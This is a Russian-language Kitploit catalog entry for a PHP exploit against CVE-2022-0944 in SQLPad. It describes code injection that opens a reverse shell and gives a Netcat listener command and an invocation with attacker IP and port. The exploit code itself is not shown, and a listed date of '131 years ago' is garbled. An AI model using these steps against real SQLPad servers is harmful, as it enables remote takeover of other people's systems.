Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
SQLPad-RCE-Exploit-CVE-2022-0944 — CVE-2022-0944 Эксплойт удалённого выполнения кода | Kitploit
Инструменты/GitHubGitHub/lipeozyy/sqlpad-rce-exploit-cve-2022-0944
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеИнструмент Удаленного Доступа
GitHublipeozyy/sqlpad-rce-exploit-cve-2022-0944

SQLPad-RCE-Exploit-CVE-2022-0944

CVE-2022-0944 Эксплойт удалённого выполнения кода

Репозиторий
131 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Как это работает:

Этот PHP-код предназначен для эксплуатации уязвимости Remote Code Execution (RCE) в SQLPad, связанной с CVE-2022-0944.
Он работает путём внедрения вредоносного кода в приложение SQLPad, заставляя его выполнять системную команду, открывающую обратную оболочку – соединение, предоставляющее атакующему удалённый контроль над уязвимой системой.


Предварительные требования:

  • PHP CLI – sudo apt-get install php-cli
  • cURL (библиотека PHP cURL) – sudo apt-get install php-curl

Использование:

1. Настройка слушателя (на машине атакующего)

Чтобы захватить соединение обратной оболочки, запустите Netcat на машине атакующего:

root@kitploit:~
nc -lvnp 4444

Запуск эксплойта

root@kitploit:~
php exploit.php <root_url> <attacker_ip> <attacker_port>

<root_url>: Корневой URL уязвимого SQLPad (например, http://target.com:3000)

<attacker_ip>: IP-адрес атакующего, слушающий обратное соединение (тот же, что и IP Netcat)

<attacker_port>: Порт, на котором слушает атакующий (тот же, что и порт Netcat)

Ссылки

Оригинальная логика эксплойта была основана на этом репозитории:

🔗 0xRoqeeb/sqlpad-rce-exploit-CVE-2022-0944

Моей целью было понять логику эксплойта и переписать его на другом языке программирования в качестве личного вызова.

Дополнительная ссылка: 🔗 CVE-2022-0944 – NVD

Скачать инструмент